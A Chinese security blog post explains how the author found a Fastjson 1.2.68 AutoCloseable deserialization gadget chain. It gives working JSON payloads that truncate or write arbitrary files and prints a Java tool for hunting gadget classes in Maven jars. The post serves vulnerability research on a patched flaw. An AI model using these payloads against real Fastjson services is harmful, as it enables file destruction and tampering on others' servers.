标题: 寻找Fastjson 1.2.68 AutoCloseable利用链
创建: 2020-08-08 17:23
更新: 2022-08-25 12:59
链接: https://scz.617.cn/web/202008081723.txt
--------------------------------------------------------------------------
目录:
☆ 前言
☆ 1.2.68漏洞复现尝试
1) 清空指定文件
1.1) AutoCloseable_TruncateFile.json
1.2) AutoCloseable_TruncateFile_1.json
2) 向指定文件写入指定内容(用到第三方库)
☆ 我是如何找到利用链的
1) 已知公开信息
2) FindSomeClass3.java
3) 吐槽一下ClassGraph
☆ 后记
☆ 参考资源
--------------------------------------------------------------------------
☆ 前言
文中涉及到的相关漏洞均为官方已经公开并修复的漏洞,涉及到的安全技术也仅用于
企业安全建设和安全对抗研究。本文仅限业内技术研究与讨论,严禁用于非法用途,
否则产生的一切后果自行承担。
参[87],浅蓝在2020.6.7公开了Fastjson 1.2.68 AutoCloseable漏洞细节。那个月
正好被薅去干别的事,没有细究它。7月底继续学习Java漏洞,决定细究一番这个洞。
用搜索引擎搜这个洞,发现绝大多数所谓分析该漏洞的文章并没有比[87]新增有效内
容,如果非要说它们新增了什么的话,大概是在文末新增了这样一段样板戏:
经过努力,终于找到了一条利用链,但现在外面没有公开的PoC,我的也就暂不
放出来了,期待看到谁谁的新链。
B味浓浓,很想点名喷之。真要看这个洞,直接看[87]就够够的,浅蓝还是很厚道的,
该讲的细节一个没拉下,不需要冗余输出的伪分析一个也没有。作为该洞最早的公开
信息源,没有提供现实世界的PoC,可以理解。推荐一下其个人主页:
https://b1ue.cn/
文章不多,绝不装X。
我在Java漏洞方向没有长期积累,水平有限,细究这个洞后找不到rt.jar中的利用链。
我没有那些大框架、大中间件的测试环境,所以也没有去找潜在的高危利用链。后来
我想开了,咱也装不了Java大拿,就在第三方库中找软柿子捏,于是有了本文。
不作漏洞分析,[87]把该讲的都讲清楚了,没啥好分析的。本文给出一个现实世界的
极小众PoC,利用第三方库向指定文件写入指定内容。严格意义上讲,也不算现实世
界的PoC,因为所用两个第三方库可能并不会同时出现,但至少比自己写一个纯原理
性PoC要有说服力些。此外,本文写了我是怎么去找这条利用链的,简单点说,写程
序在maven的本地仓库中愣找,先得到一个大致范围,再人工过滤。
☆ 1.2.68漏洞复现尝试
当时的测试环境是"RedHat 7.6+8u232+1.2.68"。
1) 清空指定文件
1.1) AutoCloseable_TruncateFile.json
--------------------------------------------------------------------------
{
'@type':"java.lang.AutoCloseable",
'@type':'java.io.FileOutputStream',
'file':'/tmp/nonexist',
'append':false
}
--------------------------------------------------------------------------
将生成空文件"/tmp/nonexist",如果已经存在,则清空原有内容。
1.2) AutoCloseable_TruncateFile_1.json
--------------------------------------------------------------------------
{
'@type':"java.lang.AutoCloseable",
'@type':'java.io.FileWriter',
'file':'/tmp/nonexist',
'append':false
}
--------------------------------------------------------------------------
抛出异常,但文件内容已被清空。
2) 向指定文件写入指定内容(用到第三方库)
--------------------------------------------------------------------------
{
'stream':
{
'@type':"java.lang.AutoCloseable",
'@type':'java.io.FileOutputStream',
'file':'/tmp/nonexist',
'append':false
},
'writer':
{
'@type':"java.lang.AutoCloseable",
'@type':'org.apache.solr.common.util.FastOutputStream',
'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=',
'sink':
{
'$ref':'$.stream'
},
'start':38
},
'close':
{
'@type':"java.lang.AutoCloseable",
'@type':'org.iq80.snappy.SnappyOutputStream',
'out':
{
'$ref':'$.writer'
}
}
}
--------------------------------------------------------------------------
java \
-cp "fastjson-1.2.68.jar:solr-solrj-6.6.2.jar:snappy-0.3.jar:." \
FastjsonDeserialize2 AutoCloseable_solr_snappy.json
$ cat /tmp/nonexist
I just want to prove that I can do it.
☆ 我是如何找到利用链的
1) 已知公开信息
参[87],浅蓝是这么说的:
--------------------------------------------------------------------------
a)
需要一个通过setter或构造函数指定文件路径的OutputStream
b)
需要一个通过setter或构造函数传入byte[]的OutputStream,并且可以通过setter或
构造函数传入一个OutputStream,最后可以通过write()将传入的字节写入传入的
OutputStream
c)
需要一个通过setter或构造函数传入一个 OutputStream,并且可以通过调用
toString、hashCode、getter、setter、构造函数等调用传入的OutputStream的
flush()
--------------------------------------------------------------------------
以上三个类组合在一起就能构造成一个写文件的利用链。
2) FindSomeClass3.java
纯手工找前述三种类不太可能,曾经在rt.jar中手工找过,学艺不精,未能得逞。退
而求其次,在maven的本地仓库中寻找潜在可用的第三方库,这需要写程序完成。
--------------------------------------------------------------------------
/*
* javac -encoding GBK -g -cp "fastjson-1.2.68.jar" FindSomeClass3.java
* java -cp "fastjson-1.2.68.jar:." FindSomeClass3
*/
import java.io.*;
import java.net.*;
import java.util.*;
import java.util.stream.Stream;
import java.util.jar.*;
import java.nio.file.*;
import java.lang.reflect.*;
import com.alibaba.fastjson.util.ASMUtils;
public class FindSomeClass3
{
private static long[] denyHashCodes = new long[]
{
0x80D0C70BCC2FEA02L,
0x86FC2BF9BEAF7AEFL,
0x87F52A1B07EA33A6L,
0x8EADD40CB2A94443L,
0x8F75F9FA0DF03F80L,
0x9172A53F157930AFL,
0x92122D710E364FB8L,
0x941866E73BEFF4C9L,
0x94305C26580F73C5L,
0x9437792831DF7D3FL,
0xA123A62F93178B20L,
0xA85882CE1044C450L,
0xAA3DAFFDB10C4937L,
0xAC6262F52C98AA39L,
0xAD937A449831E8A0L,
0xAE50DA1FAD60A096L,
0xAFFF4C95B99A334DL,
0xB40F341C746EC94FL,
0xB7E8ED757F5D13A2L,
0xBCDD9DC12766F0CEL,
0xC00BE1DEBAF2808BL,
0xC2664D0958ECFE4CL,
0xC7599EBFE3E72406L,
0xC8D49E5601E661A9L,
0xC963695082FD728EL,
0xD1EFCDF4B3316D34L,
0xD54B91CC77B239EDL,
0xD8CA3D595E982BACL,
0xDE23A0809A8B9BD6L,
0xDEFC208F237D4104L,
0xDF2DDFF310CDB375L,
0xE09AE4604842582FL,
0xE1919804D5BF468FL,
0xE2EB3AC7E56C467EL,
0xE603D6A51FAD692BL,
0xE9184BE55B1D962AL,
0xE9F20BAD25F60807L,
0xF3702A4A5490B8E8L,
0xF474E44518F26736L,
0xF7E96E74DFA58DBCL,
0xFC773AE20C827691L,
0xFD5BFC610056D720L,
0xFFA15BF021F1E37CL,
0xFFDD1A80F1ED3405L,
0x10E067CD55C5E5L,
0x761619136CC13EL,
0x3085068CB7201B8L,
0x45B11BC78A3ABA3L,
0x55CFCA0F2281C07L,
0xB6E292FA5955ADEL,
0xEE6511B66FD5EF0L,
0x100150A253996624L,
0x10B2BDCA849D9B3EL,
0x144277B467723158L,
0x14DB2E6FEAD04AF0L,
0x154B6CB22D294CFAL,
0x17924CCA5227622AL,
0x193B2697EAAED41AL,
0x1CD6F11C6A358BB7L,
0x1E0A8C3358FF3DAEL,
0x24D2F6048FEF4E49L,
0x24EC99D5E7DC5571L,
0x25E962F1C28F71A2L,
0x275D0732B877AF29L,
0x2ADFEFBBFE29D931L,
0x2B3A37467A344CDFL,
0x2D308DBBC851B0D8L,
0x313BB4ABD8D4554CL,
0x327C8ED7C8706905L,
0x332F0B5369A18310L,
0x339A3E0B6BEEBEE9L,
0x33C64B921F523F2FL,
0x34A81EE78429FDF1L,
0x3826F4B2380C8B9BL,
0x398F942E01920CF0L,
0x3B0B51ECBF6DB221L,
0x42D11A560FC9FBA9L,
0x43320DC9D2AE0892L,
0x440E89208F445FB9L,
0x46C808A4B5841F57L,
0x49312BDAFB0077D9L,
0x4A3797B30328202CL,
0x4BA3E254E758D70DL,
0x4BF881E49D37F530L,
0x4DA972745FEB30C1L,
0x4EF08C90FF16C675L,
0x4FD10DDC6D13821FL,
0x527DB6B46CE3BCBCL,
0x535E552D6F9700C1L,
0x5728504A6D454FFCL,
0x599B5C1213A099ACL,
0x5A5BD85C072E5EFEL,
0x5AB0CB3071AB40D1L,
0x5D74D3E5B9370476L,
0x5D92E6DDDE40ED84L,
0x5F215622FB630753L,
0x62DB241274397C34L,
0x63A220E60A17C7B9L,
0x665C53C311193973L,
0x6749835432E0F0D2L,
0x6A47501EBB2AFDB2L,
0x6FCABF6FA54CAFFFL,
0x746BD4A53EC195FBL,
0x74B50BB9260E31FFL,
0x75CC60F5871D0FD3L,
0x767A586A5107FEEFL,
0x7AA7EE3627A19CF3L,
0x7ED9311D28BF1A65L,
0x7ED9481D28BF417AL
};
private static void PrivateFindBlackname ( String typeName ) throws Exception
{
String className = typeName.replace('$', '.');
final long BASIC = 0xcbf29ce484222325L;
final long PRIME = 0x100000001b3L;
final long h3 =
(((((BASIC ^ className.charAt(0))
* PRIME)
^ className.charAt(1))
* PRIME)
^ className.charAt(2))
* PRIME;
long hash = h3;
for ( int i = 3; i < className.length(); ++i )
{
hash ^= className.charAt(i);
hash *= PRIME;
if ( Arrays.binarySearch( denyHashCodes, hash ) >= 0 )
{
throw new Exception();
}
}
return;
} /* end of PrivateFindBlackname */
private static void FilterConstructor ( Class clazz ) throws Exception
{
Constructor>[] consarray = clazz.getDeclaredConstructors();
int maxparamcount = 0;
Constructor> targetcons = null;
for ( Constructor cons : consarray )
{
int modifier = cons.getModifiers();
if ( ( modifier & Modifier.PUBLIC ) == 0 )
{
continue;
}
int paramcount = cons.getParameterCount();
if ( paramcount == 0 )
{
continue;
}
if ( paramcount > maxparamcount )
{
maxparamcount = paramcount;
targetcons = cons;
}
}
if ( targetcons == null )
{
return;
}
String[] lookupParameterNames
= ASMUtils.lookupParameterNames( targetcons );
if ( lookupParameterNames == null || lookupParameterNames.length == 0 )
{
return;
}
Class>[] types = targetcons.getParameterTypes();
for ( int i = 0; i < types.length; i++ )
{
if
(
OutputStream.class.isAssignableFrom( types[i] )
)
{
System.out.print
(
String.format
(
"%s\n %s\n",
clazz.getName(),
targetcons.toString()
)
);
break;
}
}
} /* end of FilterConstructor */
private static void FilterSetter ( Class clazz ) throws Exception
{
Method[] methodarray = clazz.getMethods();
for ( Method method : methodarray )
{
String methodName = method.getName();
if ( methodName.length() < 4 )
{
continue;
}
if ( !methodName.startsWith( "set" ) )
{
continue;
}
char c3 = methodName.charAt( 3 );
if ( !Character.isUpperCase( c3 ) )
{
continue;
}
int modifier = method.getModifiers();
if ( Modifier.isStatic( modifier ) )
{
continue;
}
Class> returnType = method.getReturnType();
if ( !returnType.equals( Void.TYPE ) )
{
continue;
}
Class>[] parameterTypes = method.getParameterTypes();
int paramcount = parameterTypes.length;
if ( paramcount != 1 )
{
continue;
}
if
(
OutputStream.class.isAssignableFrom( parameterTypes[0] )
)
{
System.out.print
(
String.format
(
"%s\n %s\n",
clazz.getName(),
method.toString()
)
);
}
}
} /* end of FilterSetter */
private static void GetInfoFromClass ( Class clazz ) throws Exception
{
if
(
ClassLoader.class.isAssignableFrom( clazz )
||
javax.sql.DataSource.class.isAssignableFrom( clazz )
||
javax.sql.RowSet.class.isAssignableFrom( clazz )
)
{
return;
}
if ( !AutoCloseable.class.isAssignableFrom( clazz ) )
{
return;
}
FilterConstructor( clazz );
FilterSetter( clazz );
} /* end of GetInfoFromClass */
private static void EnumerateClassFromJar ( String JarFile )
{
try
{
URLClassLoader ucl = URLClassLoader.newInstance
(
new URL[] { ( new File( JarFile ).toURI().toURL() ) }
);
JarInputStream jis = new JarInputStream( new FileInputStream( JarFile ), false );
JarEntry je;
String EntryName;
String ClassName;
Class clazz;
while ( true )
{
je = jis.getNextJarEntry();
if ( je == null )
{
break;
}
EntryName = je.getName();
if ( EntryName.endsWith( ".class" ) )
{
ClassName = EntryName.substring( 0, EntryName.length()-6 ).replace( "/", "." );
try
{
PrivateFindBlackname( ClassName );
clazz = ucl.loadClass( ClassName );
GetInfoFromClass( clazz );
}
catch ( Throwable t )
{
}
}
}
}
catch ( Exception e )
{
e.printStackTrace();
}
} /* end of EnumerateClassFromJar */
private static void EnumerateFileFromDir ( String dir, String suffix )
{
try
(
Stream paths = Files.walk( Paths.get( dir ), FileVisitOption.FOLLOW_LINKS )
)
{
paths
.filter( Files::isRegularFile )
.map( p -> p.toString() )
.filter( name -> name.endsWith( suffix ) )
.peek( System.out::println )
.forEach( FindSomeClass3::EnumerateClassFromJar );
}
catch ( Throwable t )
{
t.printStackTrace();
}
} /* end of EnumerateFileFromDir */
public static void main ( String[] argv )
{
String dir = argv[0];
EnumerateFileFromDir( dir, ".jar" );
}
}
--------------------------------------------------------------------------
FindSomeClass3.java是个示例性框架,根据需要写自己的过滤逻辑即可。有些代码
没必要,懒得删减,领会精神。
其输出结果需要用grep二次处理一下,比如:
X:\Java\jdk1.8.0_221\bin\java -cp "fastjson-1.2.68.jar;." FindSomeClass3 E:\jar > FindSomeClass3.txt
grep -E '^[^E]' -B 1 FindSomeClass3.txt > FindSomeClass3_mini.txt
在FindSomeClass3_mini.txt中人工滤出
org.iq80.snappy.SnappyOutputStream
这一步要拼运气。起初只是象征性地在虚拟机中找了找,本地仓库中没有多少jar包。
后来让金超前把他的几个G的本地仓库拷给我,这就大大增加了找到合适目标的可能。
3) 吐槽一下ClassGraph
实现FindSomeClass3.java时放狗搜过,想看看有什么成熟的轮子可用,找到
ClassGraph,参[101]。ClassGraph的作者在stackoverflow的多个贴子中猛烈推荐它,
我还真信过。
测试后发现这玩意儿有很多缺陷与不足,简单列几点:
--------------------------------------------------------------------------
a)
没有Class.isAssignableFrom()的等价实现,ClassInfo.extendsSuperclass()只能
检查祖先类,不能检查祖先接口。虽然可以用ClassInfo.getSuperclasses()和
ClassInfo.getInterfaces()自行实现Class.isAssignableFrom(),但为什么不直接
提供一个?
b)
据说支持"javac -parameters"留下的形参名字,实测发现无法获取"javac -g"留下
的形参名字,后者才是第三方库的主流。
c)
没有简单办法获取方法返回值类型
d)
没有简单办法获取方法参数类型的Class>表示
--------------------------------------------------------------------------
曾经艰难地尝试移植FindSomeClass3.java,使之使用ClassGraph,最终被其打败。
为了检查指定jar包,用到ClassGraph.overrideClasspath(),或许正是这样带来的
幺蛾子。
ClassGraph不适用于FindSomeClass3.java这种目的,换个原始需求可能用得上,在
此做个备忘。
☆ 后记
今天跟金超前吐槽,为啥我这么执著找一条这个洞的利用链,主要是看不惯除原发现
者之外的一群2B藏着掖着的德性。原发现者不给PoC我理解,后来有一些吹NB的一通
神吹装个B完事,这种特看不惯。他们应该是找到了一些链,但我觉得这没必要藏着
掖着,尤其不是自带库的情况下。如果找着了,不吹这个牛,自己留着用,这也无可
厚非。最恨这种说法,PoC还没有公开的,我的就不发了,怎么怎么的,你TM不发你
吹个毛线啊,又不是漏洞原发现者。
不过,有个例外,参[99],作者Y4er是个老实人,把浅蓝的两个洞捋了一遍,汇总了
一下非现实世界的PoC,坦言自己没有找到现实世界的PoC。他这篇对我没啥帮助,但
我仍乐意对初次接触这个洞的朋友推荐一下,看老实人写的老实文章,开卷有益。
去年我剁burp pro,就是看不惯有人藏着掖着,后来把这玩意儿打落神坛了吧。这次
也一样,缘起看不惯。尽管这次实在是囿于水平低下,但我尽力过,诸君见谅。
肯定有更贴近现实世界的高危利用链存在,我不混渗透圈,无缘得见。浅蓝还提到复
制文件的利用链,无心亦无力寻找。或许还有RCE利用链,也说不定。
本文只是我努力学习Java漏洞的一个小插曲,正如PoC所示:
I just want to prove that I can do it.
☆ 参考资源
[87]
fastjson < 1.2.66 正则表达式拒绝服务漏洞 - 浅蓝 [2020-03-24]
https://b1ue.cn/archives/314.html
fastjson 1.2.68 最新版本有限制 autotype bypass - 浅蓝 [2020-05-09]
https://b1ue.cn/archives/348.html
fastjson 1.2.68 autotype bypass反序列化漏洞gadget的一种挖掘思路 - 浅蓝 [2020-06-07]
https://b1ue.cn/archives/382.html
[99]
fastjson 1.2.68 bypass autotype - Y4er [2020-06-16]
https://y4er.com/post/fastjson-bypass-autotype-1268/
https://github.com/Y4er/fastjson-bypass-autotype-1.2.68
[101]
Classpath Specification Mechanisms
https://github.com/classgraph/classgraph
https://repo1.maven.org/maven2/io/github/classgraph/classgraph/4.8.87/classgraph-4.8.87.jar